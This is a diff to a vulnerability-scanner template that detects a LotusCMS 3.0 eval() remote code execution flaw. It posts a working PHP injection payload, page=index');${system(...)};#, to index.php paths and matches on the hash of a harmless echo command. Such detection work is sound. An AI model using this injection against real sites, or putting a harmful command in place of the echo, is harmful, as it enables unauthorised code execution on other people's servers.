--- a/vulnerabilities/other/lotuscms-rce.yaml
+++ b/vulnerabilities/other/lotuscms-rce.yaml
@@ -1,7 +1,7 @@
 id: lotuscms-rce
 
 info:
-  name: LotusCMS 3.0 - RCE
+  name: LotusCMS 3.0 eval() RCE
   author: pikpikcu
   severity: critical
   reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit
@@ -11,18 +11,18 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/index.php"
- #     - "{{BaseURL}}/lcms/index.php"
+      - "{{BaseURL}}/lcms/index.php"
+
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: |
-      page=index');${system(phpinfo())};#
+      page=index');${system('echo lotuscms_rce | md5sum')};#
 
     matchers-condition: and
     matchers:
-
       - type: word
         words:
-          - "PHP Version"
+          - "38ee63071a04dc5e04ed22624c38e648"
         part: body
 
       - type: status
